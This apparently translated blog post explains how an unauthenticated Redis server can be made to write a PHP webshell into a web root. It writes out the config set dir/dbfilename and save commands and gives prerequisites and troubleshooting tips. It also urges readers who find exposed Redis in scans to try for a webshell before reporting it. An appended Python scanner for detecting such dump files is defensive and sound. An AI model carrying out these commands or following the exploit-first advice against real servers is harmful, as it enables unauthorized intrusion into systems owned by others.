Using redis to write webshell
My view of redis and mongodb
Recently, I have been working on some small personal creations and projects, including ones that use mongodb and redis. I may not have had a deep understanding of them at first.
What is the difference between these two non-relational databases?
In fact, in my opinion, the role of redis is closer to that of memcache, while mongodb is a real database.
Redis is a key-value database. Information is stored in memory as key-value pairs. The advantage of redis over memcache lies in the diversity of its data structures.
It is not a real database, because redis mainly stores data in memory (of course, the data can also be stored on the hard disk, which is one of the necessary conditions for writing a shell). Its "cache" role is much stronger than its "data storage" role, and modifying data is as simple as operating on a variable. Mongodb is a "data storage" system. Its add, delete, modify, and query operations support "and" and "or" conditions, and its query method is as flexible as that of an SQL database, which redis does not offer.
So in my project, redis is used as the store for sessions and the task queue, while mongodb is used to store data (including user information).
On to the topic. Yesterday on freebuf I saw the security problem that redis may cause. Writing files was mentioned there, so I will explain the method here.
After redis is installed, it comes with its own command-line client, redis-cli. The commands it supports can be viewed at: http://www.bkjia.com. Every client adds, deletes, modifies, and queries data using these commands.
As mentioned earlier, redis data is mainly stored in memory. Unlike memcache, redis lets us execute the "save" command at any time to write the current data to the hard disk. In addition, redis automatically stores data to the hard disk according to its configuration.
This brings us to redis's persistence schemes (http://www.bkjia.com), of which there are two: RDB and AOF. RDB is more like a database backup file, while AOF is a log file. Redis can be configured to back up data after a specified time and number of changes, generating an RDB file. With AOF enabled, a log entry is appended to the end of a file after each operation or at a time interval. The more operations are performed, the larger the AOF file becomes.
The two complement each other. Used together, they let us store data on the server stably and persistently.
Using redis to write webshell
We use these data storage operations to write arbitrary files.
There are several key items in the redis configuration:
dir: the "working path" of redis. The generated RDB and AOF files are stored here.
dbfilename: the RDB file name. The default value is "dump.rdb".
appendonly: whether to enable AOF.
appendfilename: the AOF file name. The default value is "appendonly.aof".
appendfsync: the AOF backup method: always, everysec, or no.
Through my research, I found that we can set dir to a directory A and dbfilename to a file name B, and then execute save or bgsave. This writes an arbitrary file at the path A/B.
Once we have a redis console, we can call the config set/get commands to modify some of the redis configuration.
With config set we can change dir and dbfilename. In other words, we can write any file without modifying redis.conf or restarting the redis service:
config set dir /home/wwwroot/default/
config set dbfilename redis.php
set webshell "<?php phpinfo(); ?>"
save
Once the variable webshell is set to "<?php phpinfo(); ?>" and saved, we get a shell on the server. The data has been written.
The exported RDB is actually a binary file, but it contains <?php phpinfo(); ?>, so it is parsed.
In the previous figure, we can see that an appendonly.aof file is also generated. Can this file name be customized? Unfortunately, the value of appendfilename cannot be set with the config set command.
However, only one dbfilename is enough.
Therefore, if you find unauthorized access to redis in a scan in the future, do not rush to submit it to WooYun. Check whether the server runs any web services. If it does, try to get a webshell.
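From the defender's side, the file described above is easy to recognize: it sits in the web root with a script extension, yet it starts with the RDB header (the ASCII magic "REDIS" followed by a 4-digit version). The following check is an added example, not code from the original article. The function names, the extension list, and the sample bytes are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

RDB_MAGIC = re.compile(rb"REDIS(\d{4})")  # RDB header: magic + 4-digit version
SCRIPT_EXTS = {".php", ".phtml", ".jsp", ".asp", ".aspx"}  # assumed; adjust per site
OPEN_TAGS = (b"<?php", b"<?=", b"<%")  # tags an interpreter would start executing at


def inspect_file(path, max_bytes=1 << 20):
    """Return a finding for a file carrying the RDB header, else None."""
    with open(path, "rb") as fh:
        data = fh.read(max_bytes)  # tags beyond max_bytes are not seen
    magic = RDB_MAGIC.match(data)
    if not magic:
        return None
    return {
        "name": os.path.basename(path),
        "rdb_version": magic.group(1).decode("ascii"),
        "script_extension": os.path.splitext(path)[1].lower() in SCRIPT_EXTS,
        "open_tags": [t.decode() for t in OPEN_TAGS if t in data],
    }


def scan_webroot(root):
    """Walk root and report every file that is really a Redis dump."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            try:
                hit = inspect_file(os.path.join(dirpath, name))
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            if hit:
                findings.append(hit)
    return findings


def demo():
    with tempfile.TemporaryDirectory() as root:  # constructed web root, sample bytes
        fake = b"REDIS0006\xfe\x00\x00\x08webshell\x13<?php phpinfo(); ?>\xff"
        Path(root, "redis.php").write_bytes(fake)
        Path(root, "index.php").write_bytes(b"<?php echo 'ok'; ?>")
        return scan_webroot(root)


if __name__ == "__main__":
    print(demo())
```

Any hit inside a web root deserves investigation; a hit with script_extension set and a non-empty open_tags list matches the situation this article describes.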
Related notes
Redis usually runs with high permissions, generally root.
Prerequisites:
1. Redis is unauthenticated and redis-cli can connect to it
2. A web service is running and its path is known (for example, from phpinfo)
If it does not succeed, check: 1. whether the shell file is readable; 2. whether there is any content in front of the shell: a <? sequence there breaks the shell (the main cause may be a problem with how the shell was written).